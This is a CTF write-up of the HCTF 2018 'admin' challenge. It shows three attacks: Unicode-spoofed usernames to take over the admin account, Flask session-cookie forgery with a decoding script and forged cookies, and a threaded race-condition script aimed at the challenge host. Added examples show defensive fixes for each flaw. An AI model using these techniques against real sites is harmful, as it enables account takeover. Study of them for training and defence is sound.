[HCTF 2018]admin
2022-07-30 06:35:00 【Msaerati】
Unicode spoofing
0x01 Information gathering
The most important step in taking on a website is, of course, information gathering; what you collect determines the direction of the penetration.
I collected the following information about this site:
- Existing pages: login, register, posts (404), index, change (change password)
- In the page source of change I found the address of the site's source code, as follows
0x02 Unicode spoofing
Download the source code for auditing. Start with routes.py; the audit shows the following:
Registration, login and password change all just lowercase the submitted data, and oddly the lowercasing function is not Python's built-in one but a home-grown wrapper. Intuition says there is a problem here.
So let's look at how this function is wrapped, as follows:
The nodeprep.prepare method converts uppercase letters to lowercase, but it has one problem:
it converts the Unicode character ᴬ into A.
Unicode reference: Search - Unicode Character Table
From the code audit we know that login, register and change all use the strlower() function, which in turn calls nodeprep.prepare.
Now let's clear our heads. We only need to obtain login access as the admin user. login, register and change all use strlower(),
so perhaps we can use this property of nodeprep.prepare to change the admin user's password. How?
First we register a user ᴬdmin. After registration succeeds, the account saved in the back end is actually Admin. Then we change the password: because strlower() lowercases uppercase letters, the password we actually change is admin's.
ᴬdmin ---> Admin ---> admin
Next, register the ᴬdmin account first.
Log in to this account.
The main page is as follows; you can see the displayed account is Admin.
Next we change the password, setting it to test.
You can see the change succeeded.
After logging in as admin, we see the following.
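The root cause above is a username normalizer that is not idempotent: one pass turns ᴬdmin into Admin, a second pass turns Admin into admin, so register and change disagree about which account a name denotes. The following is an added example, not code from the challenge or from nodeprep; toy_strlower is a stand-in that merely reproduces the two-step behaviour the write-up observed, and canonical() is the defensive counterpart: NFKC normalization first (which maps the modifier letter ᴬ, U+1D2C, to A), then casefold, applied once and checked to be a fixed point. The user table and names are constructed for the example.

```python
import unicodedata

# Constructed user table for the example (not the challenge's database):
# it holds the canonical form of every registered name.
REGISTERED = {"admin"}


def toy_strlower(name: str) -> str:
    """Stand-in with the *observable* behaviour the write-up describes, not
    nodeprep's real code: compatibility characters are folded on one call
    (ᴬdmin -> Admin) and the result is lowercased only on the next call
    (Admin -> admin). Two passes therefore reach a name one pass does not."""
    folded = unicodedata.normalize("NFKC", name)
    return folded if folded != name else name.lower()


def canonical(name: str) -> str:
    """Defensive canonicalization: NFKC first (ᴬ U+1D2C -> A), then casefold.
    Order matters: str.lower()/casefold() leave U+1D2C untouched because it is
    a modifier letter with no case mapping, so casefold alone is not enough."""
    return unicodedata.normalize("NFKC", name).casefold()


def is_idempotent(normalize, sample: str) -> bool:
    """A username normalizer must be a fixed point after one application;
    otherwise register, login and change can disagree about who a name is."""
    once = normalize(sample)
    return normalize(once) == once


def has_compat_chars(name: str) -> bool:
    """True when NFKC rewrites the name, i.e. it contains look-alike
    compatibility characters worth flagging or rejecting at registration."""
    return unicodedata.normalize("NFKC", name) != name


def register(name: str, registered: set) -> bool:
    """Reject a registration whose canonical form collides with an existing
    account, and store only the canonical form so later lookups agree."""
    key = canonical(name)
    if key in registered:
        return False
    registered.add(key)
    return True


if __name__ == "__main__":
    print(repr("ᴬdmin".lower()))                  # 'ᴬdmin': plain lower() does nothing here
    print(toy_strlower("ᴬdmin"), toy_strlower(toy_strlower("ᴬdmin")))  # Admin admin
    print(is_idempotent(toy_strlower, "ᴬdmin"))   # False: the two-step trap
    print(is_idempotent(canonical, "ᴬdmin"))      # True
    print(canonical("ᴬdmin"), register("ᴬdmin", set(REGISTERED)))  # admin False
```

The is_idempotent check is cheap enough to run as a unit test over a corpus of confusable names; any normalizer that fails it has exactly the register/change mismatch exploited here.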
0x03 Flask session forgery
Looking at the source, we can tell this web app is written with the Flask framework, and Flask has a session-forgery issue.
Flask stores its session on the client side. Generally it only adds a signature to prevent interception and modification, but since the data is not encrypted we can decode the session and read the user data in it. If we also obtain the signing key, we can forge a session from the decoded data, regenerate the signature and deceive the server.
Flask encodes the bytes-typed user data of the session with base64, possibly with compression before encoding (a session starting with "." indicates it was compressed). The session Flask stores in the cookie has the general format data.timestamp.signature.
Client-side session security, further reading: https://www.leavesongs.com/PENETRATION/client-session-security.html#
Through the code audit we can see that the session is not encrypted, and we also find the signing key in config.py.
This means we can forge the session. But how do we get the flag? During the code audit we also found this in index.html:
as long as session['name'] on the index page equals admin, we get the flag.
First we grab the session from the index page:
.eJxFkEGPgjAQhf_KZs4cAOPFxIOkSCSZIUsKTXsx6iKlUjcBjFrjf99qNruHucyb-ebNe8D2ODSjhsU0XJoAtt0XLB7wsYcFEEuviq3miq_uZOVM8tQpVlsZvyo_kd1ElFURsV4j3zjKSiNNGpGjk7R5j6LuJU-04klPTJkiUwbZIca47pBX84LjrWBkUXiOKI0yuve7WprVjeznrOBl5z3cMVvrQpQWXemZaYgu0cQT42-HiuPVzy7hGcBhHI7b6fvUnP9ekELOpVgb4q1Dl3do2kiJ1KGRM48OyVAvba0pzi29elzG1C7fuM7u2uY_jJo21a9y3lkvwNSMEwRwGZvhHRtEITx_AFRzbBo.X0c0OQ.4qb0LysG2sqb3NHTApcnuwpAULw
Then we decode it with the following Python script:
import sys
import zlib
from flask.sessions import session_json_serializer   # Flask's tagged-JSON serializer
from itsdangerous import base64_decode               # URL-safe base64 without padding


def decryption(payload):
    # Cookie layout: data.timestamp.signature; strip the two trailing parts.
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    # A leading "." means the data was zlib-compressed before base64 encoding.
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')
    # No key is needed here: the data is only signed, not encrypted.
    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))
{'_fresh': True, '_id': b'410d09e026f7a13d5fcefcbd6b54e549a1234dcb1573dbbe1eea0ae0e46c8fc0763eb15993183f1b55dcf8e73ab016d794b4120aa9df34e1a430a50c4e4e306d', 'csrf_token': b'af9aac58332b285ea326741463ebea7bf6675666', 'image': b'5SHR', 'name': 'test', 'user_id': '10'}
Replace test in the decoded data with admin and re-sign it (script used: https://github.com/noraj/flask-session-cookie-manager).
.eJxFkEGLwkAMhf_KkrOHtuJF8GCZWiwkZcvYIXMRV2unY8eFqqgj_vcdZdk95JKXfHl5D1jvh-ZkYHoeLs0I1t0Opg_4-IIpkMiuWswnWs7v5HjMMvNa1I6TVxUHcsuY8lVMojcol57yyrLNYvJ0YFf0qOqeZWq0THsS2pa5tii2CSZ1h3I1KSXeSkEOVeCoympr-rBr2M5v5D7Hpay64OGO-cKUqnLoq8DMIvSpIZnacDvSEq9hdgbPEWxPw359_j40x78XWPGE1cKSbD36okPbxlplHi2PAzoiSz272lBSOHr1JCfUzt64zm3a5j-MmparX-W4cUGAzc51RxjB5dQM79wgjuD5A8BwbGM.X0c24g.yUFbBmBBsRINcJJ0r0SvkWfPh4A
Replace the session cookie and refresh to get the flag.
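The cookie format and the signing scheme described above can be checked without Flask installed. The following is an added example, not code from the write-up or from Flask/itsdangerous: a stdlib re-implementation of Flask's default session signing as I understand it (itsdangerous URLSafeTimedSerializer with salt "cookie-session", key derivation and signature both HMAC-SHA1, timestamp as a big-endian integer in URL-safe base64 without padding). decode_payload() shows that the data part is readable by anyone; verify() is the server-side check that makes the whole scheme depend on the secrecy of SECRET_KEY, and make_session() exists only to build test input. The key and session contents are constructed; PAGE_COOKIE is the cookie quoted in the write-up.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Flask's fixed salt for session cookies; key derivation and signature use
# HMAC-SHA1 (itsdangerous key_derivation="hmac", Flask's default digest).
SALT = b"cookie-session"

# The session cookie quoted in the write-up above (data.timestamp.signature).
PAGE_COOKIE = (".eJxFkEGPgjAQhf_KZs4cAOPFxIOkSCSZIUsKTXsx6iKlUjcBjFrjf99qNruHucyb-ebNe8D2ODSj"
               "hsU0XJoAtt0XLB7wsYcFEEuviq3miq_uZOVM8tQpVlsZvyo_kd1ElFURsV4j3zjKSiNNGpGjk7R5"
               "j6LuJU-04klPTJkiUwbZIca47pBX84LjrWBkUXiOKI0yuve7WprVjeznrOBl5z3cMVvrQpQWXemZ"
               "aYgu0cQT42-HiuPVzy7hGcBhHI7b6fvUnP9ekELOpVgb4q1Dl3do2kiJ1KGRM48OyVAvba0pzi29"
               "elzG1C7fuM7u2uY_jJo21a9y3lkvwNSMEwRwGZvhHRtEITx_AFRzbBo.X0c0OQ.4qb0LysG2sqb3NHTApcnuwpAULw")


def b64url_decode(s: str) -> bytes:
    """itsdangerous-style base64: URL-safe alphabet, padding stripped."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def decode_payload(cookie: str) -> dict:
    """Reads the data part without any key: the session is signed, not encrypted.
    bytes values stay as Flask's tagged objects ({" b": "<base64>"}) since the
    tagged JSON is not untagged here."""
    data, _ts, _sig = cookie.rsplit(".", 2)
    compressed = data.startswith(".")        # leading "." marks zlib compression
    raw = b64url_decode(data[1:] if compressed else data)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def _derive_key(secret_key: bytes) -> bytes:
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def _signature(data_and_ts: str, secret_key: bytes) -> bytes:
    return hmac.new(_derive_key(secret_key), data_and_ts.encode("ascii"), hashlib.sha1).digest()


def issued_at(cookie: str) -> int:
    """Timestamp part: big-endian integer seconds, URL-safe base64 encoded."""
    ts = cookie.rsplit(".", 2)[1]
    return int.from_bytes(b64url_decode(ts), "big")


def verify(cookie: str, secret_key: bytes, max_age=None, now=None):
    """Server-side check: the session dict if the signature is valid under
    secret_key (and the cookie is not older than max_age seconds), else None."""
    data, ts, sig = cookie.rsplit(".", 2)
    expected = _signature(f"{data}.{ts}", secret_key)
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    if max_age is not None:
        age = (now if now is not None else time.time()) - issued_at(cookie)
        if age > max_age:
            return None
    return decode_payload(cookie)


def make_session(session: dict, secret_key: bytes, ts=None) -> str:
    """Builds a cookie the way Flask does; used here only to create test input."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:       # Flask compresses only when it helps
        data = "." + b64url_encode(compressed)
    else:
        data = b64url_encode(raw)
    ts = int(time.time()) if ts is None else ts
    ts_part = b64url_encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = f"{data}.{ts_part}"
    return f"{signed}.{b64url_encode(_signature(signed, secret_key))}"


if __name__ == "__main__":
    key = b"constructed-demo-key"          # constructed; the real key lives in config.py
    cookie = make_session({"name": "test", "user_id": "10"}, key)
    print(verify(cookie, key))              # the session dict
    print(verify(cookie, b"another-key"))   # None: signature does not match
    print(decode_payload(PAGE_COOKIE)["name"], issued_at(PAGE_COOKIE))  # readable without the key
```

Because verify() derives everything from secret_key, the defensive checklist is short: keep the key out of the repository (config.py here), rotate it if it leaks, and set a max_age so an old cookie cannot be replayed indefinitely.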
0x04 Race condition
The password change just takes the name value from the session and modifies that user's password; if this name value can be made admin, the admin account's password can be changed.
At login, the submitted username is assigned to the session's name directly, without verification, so if we log in as admin while a password change is in progress, in theory the admin account's password can be modified.
We can write a two-threaded Python script: one thread logs in to the test account and changes the password, the other logs out the test account and logs in as admin (login here means just the username admin; the password is incorrect).
import requests
import threading


def login(s, username, password):
    data = {
        'username': username,
        'password': password,
        'submit': ''
    }
    return s.post("http://admin.2018.hctf.io/login", data=data)


def logout(s):
    return s.get("http://admin.2018.hctf.io/logout")


def change(s, newpassword):
    data = {
        'newpassword': newpassword
    }
    return s.post("http://admin.2018.hctf.io/change", data=data)


def func1(s):
    # Thread 1: log in to our own account and change the password.
    login(s, 'skysec', 'skysec')
    change(s, 'skysec')


def func2(s):
    # Thread 2: log out and log in as admin with a wrong password, which
    # still puts 'admin' into session['name'] for a moment.
    logout(s)
    res = login(s, 'admin', 'skysec')
    if '<a href="/index">/index</a>' in res.text:
        print('finish')


def main():
    for i in range(1000):
        print(i)
        # Both threads share one requests.Session, i.e. one cookie jar.
        s = requests.Session()
        t1 = threading.Thread(target=func1, args=(s,))
        t2 = threading.Thread(target=func2, args=(s,))
        t1.start()
        t2.start()


if __name__ == "__main__":
    main()
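The bug is an ordering one: the login handler writes the submitted name into the session before the password is verified, and the change handler trusts whatever name it finds there. The following is an added example, not the challenge's code: a simplified, single-process model of that pattern beside a hardened version, with the race made deterministic through a demo-only window() hook instead of real threads contending on a server. The credential store, usernames and passwords are constructed; the hardened handlers write the session only after a successful check and key the password change on that post-authentication value.

```python
import hashlib
import secrets
import threading

# Constructed credential store for the example (not the challenge's database):
# username -> [salt, pbkdf2 hash]. Iteration count kept low for a quick demo.
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


def make_store(creds: dict) -> dict:
    store = {}
    for user, pw in creds.items():
        salt = secrets.token_bytes(16)
        store[user] = [salt, _hash(pw, salt)]
    return store


def check_password(store: dict, user: str, password: str) -> bool:
    rec = store.get(user)
    return rec is not None and secrets.compare_digest(rec[1], _hash(password, rec[0]))


def set_password(store: dict, user: str, password: str) -> None:
    salt = secrets.token_bytes(16)
    store[user] = [salt, _hash(password, salt)]


# --- vulnerable pattern, simplified from the write-up's description ----------
def login_vulnerable(store, session, user, password, window=None):
    session["name"] = user            # stored BEFORE the password is checked
    if window:
        window()                      # demo hook: another request runs here
    if check_password(store, user, password):
        return True
    session.pop("name", None)         # cleaned up on failure, but too late
    return False


def change_vulnerable(store, session, new_password):
    user = session.get("name")        # trusts whatever name is in the session
    if user is None:
        return None
    set_password(store, user, new_password)
    return user


# --- hardened pattern ---------------------------------------------------------
def login_fixed(store, session, user, password, window=None):
    ok = check_password(store, user, password)
    if window:
        window()
    if not ok:
        return False                  # nothing is ever written on failure
    session["user"] = user            # written only after successful auth
    return True


def change_fixed(store, session, new_password):
    user = session.get("user")        # present only for an authenticated user
    if user is None:
        return None
    set_password(store, user, new_password)
    return user


def run_interleaving(login, change, store):
    """Reproduce the write-up's interleaving deterministically: a logged-out
    session, a parked login attempt for admin with a wrong password, and a
    password change that lands inside that window. Returns the account whose
    password was changed, or None."""
    session = {}
    login(store, session, "test", "test-pw")          # attacker-owned account
    session.clear()                                   # logout
    reached, hold = threading.Event(), threading.Event()

    def window():
        reached.set()
        hold.wait()

    t = threading.Thread(target=login, args=(store, session, "admin", "wrong-pw", window))
    t.start()
    reached.wait()                                    # login is parked in the window
    victim = change(store, session, "new-pw")
    hold.set()
    t.join()
    return victim


if __name__ == "__main__":
    store = make_store({"admin": "admin-secret", "test": "test-pw"})
    print(run_interleaving(login_vulnerable, change_vulnerable, store))  # admin
    store = make_store({"admin": "admin-secret", "test": "test-pw"})
    print(run_interleaving(login_fixed, change_fixed, store))            # None
```

The fix is not a lock: it is never letting unverified input into the session, and reading the change target from a value that only a successful authentication can have written. Requiring the current password on the change form is a second, independent guard.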